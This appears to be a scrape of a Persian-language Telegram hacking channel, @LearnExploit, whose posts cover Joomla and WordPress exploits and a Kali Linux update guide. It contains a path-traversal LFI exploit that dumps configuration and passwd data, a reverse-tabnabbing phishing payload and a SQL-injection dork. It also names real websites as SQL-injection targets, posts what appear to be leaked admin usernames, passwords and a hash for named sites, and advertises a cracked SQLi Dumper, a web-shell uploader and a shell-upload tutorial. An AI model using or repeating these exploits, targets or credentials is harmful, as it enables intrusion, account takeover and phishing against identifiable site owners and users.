💠🌐🌀
🔰⚜️
💢
#Joomla (Joomla!) #Component #EasyShop (Easy Shop) v 1.2.3 #LFI Local File Inclusion #Vulnerable
➖➖➖➖➖➖➖➖
آسیب پذیری LFI در کامپوننته Easy Shop جوملا :
#~Exploit Title :
Joomla! Component Easy Shop 1.2.3 - Local File Inclusion
〰〰〰〰
#~Path :
آدرسی باگ :
http://localhost/[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=‍‍‍
〰〰〰〰
#~Exploit :
نحوه ی اکسپلویت :
== > برای اینکه اکسپلویت اجرا بشه باید دستورات رو بصورت کاراکتر های Base64 انکود کنید و به اخر url اضافه کنید
مانند :
‍`/[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=Li4vLi4vY29uZmlndXJhdGlvbi5waHA=`

اگر قسمت انکود شده را دیکود کنیم برابر با عبارت زیر میشود :
../../configuration.php

بخشی از پاسخی که سایت برای ما برمیگردونه :
‍`root:x:0:0:root:/root:/bin/bash`
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
〰〰〰〰
برای اینکه بتوانید دستورات خودتون را انکود کنید بهترین راه استفاده از BurpSuite است.(در تب Decoder )
〰〰〰〰
Software Link
➖➖➖➖➖➖➖➖
⚜️ linux@0day:~#./@LearnExploit
⚜️ IR0Day.Today Boy's

🔰 #CloudMe_Sync v1.11.2 #Buffer_Overflow ( #BoF ) and #Egghunt #Vulnerable
➖➖➖➖➖➖➖
آسیب پذیری سرریزبافر در برنامه CloudMe_Sync v1.11.2 :
#~Exploit Title:
CloudMe Sync v1.11.2 Buffer Overflow + Egghunt
〰〰〰〰〰
#~Description :
نحوه ی کار کردن با اکسپلویت و باگ در اینجا کلیک کنید.
〰〰〰〰〰
#~Software and Exploit :
💲 Software
💲 Exploit
➖➖➖➖➖➖➖
@LearnExploit — > IR0Day.Today Boy's

#Wordpress #Plugin #Wisechat <= V 2.6.3 - #Reverse #Tabnabbing - #Vulnerable #Vuln (Vulnerable)
➖➖➖➖➖➖➖➖➖➖

آسیب پذیری - برگه ی معکوس یا صفحه ی دزدی معکوس ( Reverse Tabnabbing ) در پلاگین WiseChat وردپرس :

✅ Exploit Title :
Wordpress Plugin Wisechat <= 2.6.3 - Reverse Tabnabbing

➖➖

✅ Exploit :

<html>
<script>
if (window.opener) window.opener.parent.location.replace(' #Pishing Page');
if (window.parent != window) window.parent.location.replace('#Pishing Page');
</script>
Open Redirect TEST
</html>

➖➖
🔰 Description :
#توضیحات :
وقتی کاربر روی لینک مخرب کلیک میکنید محتویات لینک مخرب در تب جدید اما درخوده URL سایت به ما نمایش داده میشود
برای فهمیدن روی عکس ها کلیک کنید :
1 - Pic_1

2 - Pic_2

➖➖
✅ Demo WiseChat :
دمو پلاگین
➖➖
✅ About Reverse Tabnabbing :
اطلاعات بیشتر در مورد آسیب پذیری برگه ی معکوس در پست بعدی.
با تشکر از همراهی شما دوستان...

➖➖➖➖➖➖➖➖➖➖
⛓ ++ > @LearnExploit <++

#About #Reverse #Tabnabbing #Vulnerable ::
➖➖➖➖➖➖➖
✅ برگه ی معکوس یا صفحه دزدی معکوس ::
Reverse Tabnabbing
نوعی صفحه دزدی است که در فهرست حمله های فیشینگ (Phishing) قرار می گیرد و در آن مهاجم به کمک
window.opener.location.assign()
صفحه ای قانونی و قابل اعتماد ایجاد می کند که در آن محتوی مخرب وجود دارد.

به طور خلاصه، در Reverse Tabnabbing وقتی بر روی یک لینک در صفحه وب کلیک می کنیم تا صفحه ای جدید باز شود و آن صفحه هم باز می شود اما وقتی که به صفحه قبلی باز می گردیم همه چیز به ظاهر عادی است اما در واقع پشت سر ما تغییراتی صورت گرفته و به وضوح می توان تغییر را در آدرس اینترنتی آن صفحه مشاهده کرد. اما بسیاری از کاربران متوجه تغییر در URL نمی شوند.

وقتی که به صفحه اصلی بر می گردیم، امکان دارد از ما خواسته شود که بار دیگر وارد حساب کاربری شویم. مهاجمان در واقع صفحه اصلی را با محتوی مخرب تعویض کرده اند، این تغییرات شامل فاویکون و نوار آدرس سایت می شود اما ما متوجه آن نمی شویم. اطلاعات کاربری مان را وارد کرده و هک می شویم.
➖➖➖
🔰 demo Bug :
برای مشاهده ی نحوه ی کار کردن روی لینک کلیک کنید.
با تشکر از همراهی شما.
➖➖➖
⛓ ++ > @LearnExploit <++

#Dork - #SQLi (Structure Query Language Injection)
#WordPress - #Plugin - #PT_Content_Views_Pro v 2.1.2
➖➖➖➖➖➖➖

🔰 #~Exploit Title :
WordPress PT-Content-Views-Pro Plugins 2.1.2 SQL Injection
➖➖➖➖

🔰 #~Dork :
inurl:''/wp-content/plugins/pt-content-views-pro/''

➖➖➖➖

🔰 #~Inpact :
/wp-content/plugins/pt-content-views-pro/admin/content-views-admin.php?id=[SQL Injection]

➖➖➖➖

🔰 #~Example :
happyhormonecottage.com/wp-content/plugins/pt-content-views-pro/admin/content-views-admin.php?id=1%27

➖➖➖➖

🔰 #~db_Error:
Fatal error: Class 'PT_Content_Views_Admin' not found in /home/hhcnewserver/public_html/wp-content/plugins/pt-content-views-pro /admin/content-views-admin.php on line 12

➖➖➖➖➖➖➖
🌐 Software Download Link
🌐 Software Information Link
با تشکر از دوستان
➖➖➖➖➖➖➖
[+] T.me/LearnExploit
[-] 0Day.Today Boy's

دیتابیس سایت نیوتک
www.ontco.com
دانلود در پست بعد
#dgtalboy
@LearnExploit

دیتابیس سایت نیوتک
www.ontco.com
#dgtalboy
@LearnExploit

vilayaa.com/index.php
user : admin & abhay
pass admin : Vila12161990
pass abhay : abhay@2435
#dgtalboy
@learnexploit

#Data #Base #User #Pass #Site
➖➖➖➖➖➖➖➖➖
https://www.bankofbaroda.ug

یوزرنیم و پسورد ادمین ها در پست بعد
➖➖➖➖➖➖➖➖➖
@LearnExploit
0Day.Today Boy’s

#Data #Base #User #Pass #Site
➖➖➖➖➖➖➖➖➖
https://www.bankofbaroda.ug

یوزرنیم و پسورد ادمین ها
➖➖➖➖➖➖➖➖➖
@LearnExploit
0Day.Today Boy’s

#Data #Base #User #Pass #Site
➖➖➖➖➖➖➖➖➖
www.ghanatimber.org
یوزرنیم و پسورد ادمین
cms@manage010
a8266095acf1f51efe5ab22e34808a86
➖➖➖➖➖➖➖➖➖
@LearnExploit
0Day.Today Boy’s

www.meggieschneider.com/php/detail.php?id=48
تارگت SQL

http://www.cubiceducationbd.com/index.php?id=45
تارگت sql

🔰 #Soft #SQLi_Dumper (SQLi Dumper Pro v 9.7)
➖➖➖➖➖➖➖
دانلود برنامه SQLi Dumper برای کامپیوتر
ورژن برنامه : 9.7
کرک شده توسط : PC-RET
دانلود در پست بعدی
➖➖➖➖➖➖➖
🔸 @LearnExploit 🔸

🔰 #Soft #SQLi_Dumper (SQLi Dumper Pro v 9.7)
➖➖➖➖➖➖➖
دانلود برنامه ** SQLi Dumper ** برای کامپیوتر
ورژن برنامه : 9.7
کرک شده توسط : PC-RET
➖➖➖➖➖➖➖
🔸 @LearnExploit 🔸

🔰 #Uploader #WebShell #PHP
➖➖➖➖➖➖➖➖➖
نام : دانلود شل اپلودر
توضیحات : با استفاده از این شل میتوانید شل های پیشرفته ی خودتون رو در سایت اپلود کنید.
➖➖➖➖➖➖➖➖➖
🔰 @LearnExploit

〽️ #Upload - #Shell - (#WP_v_5_0_3) #WordPress v 5.0.3 - #Part_1
➖➖➖➖➖➖➖➖
🔱 موضوع : اموزش اپلود شل روی وردپرس ورژن 5.0.3
🔱 قسمت : 1
🔱 صدا : دارد بدون نویز
🔱 کیفیت : 720
🔱 حجم : 17m
⚠️ اختصاصی از گروه اموزش LearnExploit
⁉️ دانلود در پست بعدی...
➖➖➖➖➖➖➖➖
✴️ T.me/LearnExploit
☣️ IR0Day.Today Boy's

〽️ #Upload - #Shell - (#WP_v_5_0_3) #WordPress v 5.0.3 - #Part_1
➖➖➖➖➖➖➖➖
🔱 موضوع : اموزش اپلود شل روی وردپرس ورژن 5.0.3
🔱 قسمت : 1
🔱 صدا : دارد بدون نویز
🔱 کیفیت : 720
🔱 حجم : 17m
⚠️ اختصاصی از گروه اموزش LearnExploit
➖➖➖➖➖➖➖➖
✴️ T.me/LearnExploit
☣️ IR0Day.Today Boy's

✅ #Kali #Linux #Update #2019_1 (2019.1) #Download
➖➖➖➖➖➖➖➖
🔘 بالاخره ورژن 2019 کالی با نام kali 2019.1 منتشر شد.
☑️ چه چیز هایی اپدیت شده :
✔️ اپدیت کرنل به نسخه ی 4.19.13
✔️ اپدیت ابزار قدرتمند متاسپلویت به ورژن 5.0
⁉️ ( برای دریافت اطلاعات بیشتر در مورد ورژن 5.0 متاسپلویت کلیک کنید. )
✔️ اپدیت برنامه هایی مانند theHarvester و DBeaver و...
⁉️ ( برای کسب اطلاعات بیشتر در مورد اپدیت هر یک از ابزار های بالا بر روی نام برنامه کلیک کنید.
1 - TheHarvester
2 - DBeaver
)
✔️ اپدیت ARM .
✅ برای دیافت اطلاعات بیشتر در مورد kali 2019.1 کلیک کنید.
✅ همچنین دوستان شما میتوانید اطلاعاتی هم در مورد اپدیت بعدی کالی یعنی kali 2019.2 داشته باشید.!
✅ برای کسب اطلاعات بیشتر در مورد kali 2019.2 کلیک کنید.
➖➖➖➖
🌐 دانلود کالی 2019.1 :
💠 Download Kali 2019.1

➖➖➖➖

⚠️ نحوه ی اپدیت به ورژن جدید در پست بعدی...
➖➖➖➖➖➖➖➖
@LearnExploit
IR0Day.Today BOY'S

🔰 #Update #Klai #Older_Version to #Klai #2019_1 with #Terminal
➖➖➖➖➖➖➖➖
♻️ اموزش اپدیت کالی ورژن های پایین به کالی 2019.1 با استفاده از ترمینال :
1 - چک کرد مخازن :
root@kali:~# cat /etc/apt/sources.list
deb http://http.kali.org/kali kali-rolling main non-free contrib

2 - نصب و دریافت اپدیت از طریق ترمینال :
root@kali:~# apt update && apt -y full-upgrade

3 - چک کردن ورژن کالی :
root@kali:~# grep VERSION /etc/os-release
VERSION="2019.1"
VERSION_ID="2019.1"
root@kali:~# uname -a
Linux kali 4.19.0-kali1-amd64 #1 SMP Debian 4.19.13-1kali1 (2019-01-03) x86_64 GNU/Linux
➖➖➖➖➖➖➖➖
@LearnExploit
IR0Day.Today BOY'S